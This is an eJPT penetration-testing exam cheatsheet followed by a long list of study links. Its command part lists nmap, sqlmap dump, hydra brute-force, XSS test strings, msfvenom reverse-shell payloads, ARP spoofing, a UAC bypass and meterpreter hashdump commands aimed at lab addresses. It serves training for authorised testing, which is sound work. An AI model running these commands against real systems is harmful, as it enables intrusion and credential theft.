eJPT-Cheatsheet
This is a Cheatsheet for eJPT exam + course. [Source: githubmemory.com]
Command Cheetsheet:
Nmap
nmap -sn 10.10.10.0/24 nmap -sV -p- -iL targets -oN nmap.initial -v nmap -A -p- -iL targets -oN nmap.aggressive -v nmap -p --script=vuln -v
fPing
fping -a -g 10.10.10.0/24 2>/dev/null > targets
IP Route
Syntax ip route add <Network-range> via <router-IP> dev <interface> eg. ip route add 10.10.10.0/24 via 10.10.11.1 dev tap0
John
john --wordlist=/usr/share/wordlists/rockyou.txt --format=raw-md5 unshadow passwd shadow > unshadowed.txt john --wordlist=/usr/share/wordlists/rockyou.txt unshadowed.txt
dirb
dirb http://10.10.10.10/ dirb http://10.10.10.10/dir -u admin:admin
I suggest you to use dirbuster for better speed. Keep the threads at 20. Use /usr/share/wordlists/dirb/common.txt wordlist.
Netcat
Listening for reverse shell nc -nvlp 1234
Banner Grabbing nc -nv 10.10.10.10 <port>
SQLMap
Check if injection exists
sqlmap -r Post.req sqlmap -u "http://10.10.10.10/file.php?id=1" -p id sqlmap -u "http://10.10.10.10/login.php" --data="user=admin&password=admin"
Get database if injection Exists
sqlmap -r login.req --dbs sqlmap -u "http://10.10.10.10/file.php?id=1" -p id --dbs sqlmap -u "http://10.10.10.10/login.php" --data="user=admin&password=admin" --dbs\
Get Tables in a Database
sqlmap -r login.req -D dbname --tables sqlmap -u "http://10.10.10.10/file.php?id=1" -p id -D dbname --tables sqlmap -u "http://10.10.10.10/login.php" --data="user=admin&password=admin" -D dbname --tables
Get data in a Database tables
sqlmap -r login.req -D dbname -T table_name --dump sqlmap -u "http://10.10.10.10/file.php?id=1" -p id -D dbname -T table_name --dump sqlmap -u "http://10.10.10.10/login.php" --data="user=admin&password=admin" -D dbname -T table_name --dump
Hydra
SSH Login Bruteforcing hydra -v -V -u -L users.txt -P passwords.txt -t 1 -u 10.10.10.10 ssh hydra -v -V -u -l root -P passwords.txt -t 1 -u 10.10.10.10 ssh You can use same for FTP, just replace ssh with ftp
HTTP POST Form hydra http://10.10.10.10/ http-post-form "/login.php:user=^USER^&password=^PASS^:Incorrect credentials" -L usernames.txt -P passwords.txt -f -V
You will know which wordlists to use when the time comes
XSS
<script>alert(1)</script> <ScRiPt>alert(1)</ScRiPt>
This is a great filter bypass cheatsheet https://owasp.org/www-community/xss-filter-evasion-cheatsheet
msfvenom shells
JSP Java Meterpreter Reverse TCP msfvenom -p java/jsp_shell_reverse_tcp LHOST= LPORT= -f raw > shell.jsp
WAR msfvenom -p java/jsp_shell_reverse_tcp LHOST= LPORT= -f war > shell.war
PHP msfvenom -p php/meterpreter_reverse_tcp LHOST= LPORT= -f raw > shell.php cat shell.php | pbcopy && echo '<?php ' | tr -d '\n' > shell.php && pbpaste >> shell.php
Metasploit Meterpreter autoroute
run autoroute -s 10.10.10.0/24
ARPSpoof
echo 1 > /proc/sys/net/ipv4/ip_forward arpspoof -i -t -r arpspoof -i tap0 -t 10.100.13.37 -r 10.100.13.36
SMB Enumeration
Get shares, users, groups, password policy smbclient -L //10.10.10.10/ enum4linux -U -M -S -P -G 10.10.10.10 nmap --script=smb-enum-users,smb-os-discovery,smb-enum-shares,smb-enum-groups,smb-enum-domains 10.10.10.10 -p 135,139,445 -v nmap -p445 --script=smb-vuln-* 10.10.10.10 -v
Access Share smbclient //10.10.10.10/share_name
FTP Enumeration
nmap --script=ftp-anon 10.10.10.10 -p21 -v nmap -A -p21 10.10.10.10 -v
Login to FTP server ftp 10.10.10.10
Meterpreter
ps getuid getpid getsystem ps -U SYSTEM
CHECK UAC/Privileges run post/windows/gather/win_privs
BYPASS UAC Background the session first exploit/windows/local/bypassuac set session
After PrivEsc migrate <pid> hashdump
Windows Command Line
To search for a file starting from current directory dir /b/s "*.conf*" dir /b/s "*.txt*" dir /b/s "*filename*"
Check routing table route print netstat -r
Check Users net users
List drives on the machine wmic logicaldisk get Caption,Description,providername
Notes:
External Resources:
Notes:
https://massive-starburst-e68.notion.site/course-PTSv4-22ad4ca2ce3e4fe0a5e369217b41c9b3
Resources:
All in one playlist:
https://www.youtube.com/playlist?list=PLLKT__MCUeiyxF54dBIkzEXT7h8NgqQUB
https://www.youtube.com/watch?v=qlK174d_uu8&list=PLLKT__MCUeiwBa7d7F_vN1GUwz_2TmVQj
https://www.youtube.com/playlist?list=PLLKT__MCUeiwfK18Io6kvwrrhqQyQnV5W
https://www.youtube.com/watch?v=4Kho3Eeyx1U&list=PLLKT__MCUeiyUKmYaakznsZeU4lZYwt_j
Prerequisites:
https://www.hackingarticles.in/wireshark-for-pentesters-a-beginners-guide/
https://www.hackingarticles.in/beginner-guide-cryptography-part-1/
https://www.hackingarticles.in/beginner-guide-classic-cryptography/
https://github.com/Ignitetechnologies/BurpSuite-For-Pentester
https://www.hackingarticles.in/beginner-guide-understand-cookies-session-management/
https://www.hackingarticles.in/comprehensive-guide-on-broken-authentication-session-management/
https://www.acunetix.com/blog/web-security-zone/what-is-same-origin-policy/
https://www.javatpoint.com/computer-network-routing
https://www.geeksforgeeks.org/types-of-routing/
Programming:
C++:https://www.tutorialspoint.com/cplusplus/index.htm
python: https://www.youtube.com/watch?v=gfDE2a7MKjA (Hindi)
python: https://www.youtube.com/watch?v=WGJJIrtnfpk (English)
Bash scripting: https://www.youtube.com/playlist?list=PLBf0hzazHTGMJzHon4YXGscxUvsFpxrZT
Penetration Testing Basics:
OSINT:
https://osintframework.com/
https://portswigger.net/daily-swig/osint-what-is-open-source-intelligence-and-how-is-it-used
Subdomain enumeration:
https://medium.com/@_ncpd/subdomain-enumeration-made-easy-ba843037ab76
https://medium.com/@polihenko.o/subdomain-enumeration-penetration-testing-60a0c0e58d3a
https://medium.com/@edu4rdshl/subdomains-enumeration-what-is-how-to-do-it-monitoring-automation-using-webhooks-and-5e0a0c6d9127
Nmap:
https://github.com/Ignitetechnologies/Nmap-For-Pentester
Masscan:
https://resources.infosecinstitute.com/topic/masscan-scan-internet-minutes/
Nessus:
https://www.youtube.com/watch?v=vlGm80hj9c4 (Hindi)
Netcat:
https://www.hackingarticles.in/netcat-for-pentester/
Dirbuster:
https://www.hackingarticles.in/comprehensive-guide-on-dirbuster-tool/
https://www.hackingarticles.in/5-ways-directory-bruteforcing-web-server/
Cross-site scripting(Xss):
https://www.hackingarticles.in/comprehensive-guide-on-cross-site-scripting-xss/
https://www.hackingarticles.in/cross-site-scripting-exploitation/
SQL injection:
https://www.hackingarticles.in/beginner-guide-sql-injection-part-1/
https://www.hackingarticles.in/beginner-guide-sql-injection-boolean-based-part-2/
https://www.hackingarticles.in/manual-sql-injection-exploitation-step-step/
https://www.hackingarticles.in/form-based-sql-injection-manually/
https://www.hackingarticles.in/exploiting-form-based-sql-injection-using-sqlmap/
https://www.hackingarticles.in/bypass-filter-sql-injection-manually/
https://www.hackingarticles.in/exploiting-sql-injection-nmap-sqlmap/
Sqlmap:
https://www.hackingarticles.in/exploiting-sql-injection-nmap-sqlmap/
https://www.hackingarticles.in/comprehensive-guide-to-sqlmap-target-options15249-2/
John the Ripper:
https://www.hackingarticles.in/beginner-guide-john-the-ripper-part-1/
https://www.hackingarticles.in/beginners-guide-for-john-the-ripper-part-2/
https://www.csoonline.com/article/3564153/john-the-ripper-explained-an-essential-password-cracker-for-your-hacker-toolkit.html
Hashcat:
https://www.hackers-arise.com/post/2016/05/26/cracking-passwords-with-hashcat
https://resources.infosecinstitute.com/topic/hashcat-tutorial-beginners/
https://miloserdov.org/?p=5426
Hydra:
https://www.hackingarticles.in/comprehensive-guide-on-hydra-a-brute-forcing-tool/
Null session attack:
https://www.dummies.com/programming/networking/null-session-attacks-and-how-to-avoid-them/
Metasploit:
https://www.tutorialspoint.com/metasploit/index.htm
https://www.youtube.com/watch?v=8lR27r8Y_ik&list=PLBf0hzazHTGN31ZPTzBbk70bohTYT7HSm
Wordlist:
https://www.hackingarticles.in/wordlists-for-pentester/
TryHackME Rooms:
(P): indicates need paid subscription of tryhackme
Fundamentals:
https://tryhackme.com/room/bpnetworking
https://tryhackme.com/room/hackermethodology
https://tryhackme.com/room/howwebsiteswork
https://tryhackme.com/room/passwordsecurity
https://tryhackme.com/room/cryptographyfordummies
https://tryhackme.com/room/introtonetworking
https://tryhackme.com/room/webfundamentals
https://tryhackme.com/room/networkservices
https://tryhackme.com/room/networkservices2
Linux:
https://tryhackme.com/room/linux1
https://tryhackme.com/room/linux2
https://tryhackme.com/room/linux3
https://tryhackme.com/room/linuxbackdoors
https://tryhackme.com/room/linuxagency
https://tryhackme.com/room/linuxmodules
https://tryhackme.com/room/linuxstrengthtraining
Tools:
https://tryhackme.com/room/openvas
https://tryhackme.com/room/rustscan
https://tryhackme.com/room/furthernmap
https://tryhackme.com/room/rpnessusredux
https://tryhackme.com/room/learnowaspzap
https://tryhackme.com/room/rpburpsuite (P)
Programming:
https://tryhackme.com/room/bashscripting
https://tryhackme.com/room/rust
https://tryhackme.com/room/javascriptbasics
https://tryhackme.com/room/scripting (P)
https://tryhackme.com/room/introtopython (P)
https://tryhackme.com/room/intropocscripting
Privillage escalation:
https://tryhackme.com/room/windows10privesc
https://tryhackme.com/room/windowsprivescarena
https://tryhackme.com/room/linuxprivesc
https://tryhackme.com/room/linuxprivescarena
https://tryhackme.com/room/persistence (P)
https://tryhackme.com/room/commonlinuxprivesc
https://tryhackme.com/room/binex (P)
https://tryhackme.com/room/postexploit
Cryptography:
https://tryhackme.com/room/johntheripper0 (P)
https://tryhackme.com/room/crackthehash
https://tryhackme.com/room/crackthehashlevel2
https://tryhackme.com/room/hashingcrypto101
Web attacks:
https://tryhackme.com/room/sqlilab
https://tryhackme.com/room/owasptop10
https://tryhackme.com/room/owaspmutillidae
https://tryhackme.com/room/xss (P)
https://tryhackme.com/room/uploadvulns (P)
https://tryhackme.com/room/sqlibasics (P)
https://tryhackme.com/room/owaspjuiceshop (P)
https://tryhackme.com/room/webenumerationv2 (P)
https://tryhackme.com/room/rpwebscanning
https://tryhackme.com/room/googledorking
https://tryhackme.com/room/bruteit
https://tryhackme.com/room/webosint
https://tryhackme.com/room/introtoresearch
https://tryhackme.com/room/introtoshells
https://tryhackme.com/room/bolt
Misc:
https://tryhackme.com/room/h4cked
https://tryhackme.com/room/dnsmanipulation
https://tryhackme.com/room/wekorra
https://tryhackme.com/room/mitre
https://tryhackme.com/room/vulnversity
https://tryhackme.com/room/poster
https://tryhackme.com/room/relevant
https://tryhackme.com/room/adventofcyber2
https://tryhackme.com/room/marketplace
Paid(required tryhackme premium subscription):
https://tryhackme.com/room/lle
https://tryhackme.com/room/wireshark
https://tryhackme.com/room/gamezone
https://tryhackme.com/room/eritsecurusi
Course Review:
https://kentosec.com/2019/08/04/how-to-pass-the-ejpt/
https://kentosec.com/2019/08/04/elearnsecurity-junior-penetration-tester-ejpt-course-review/
Last updated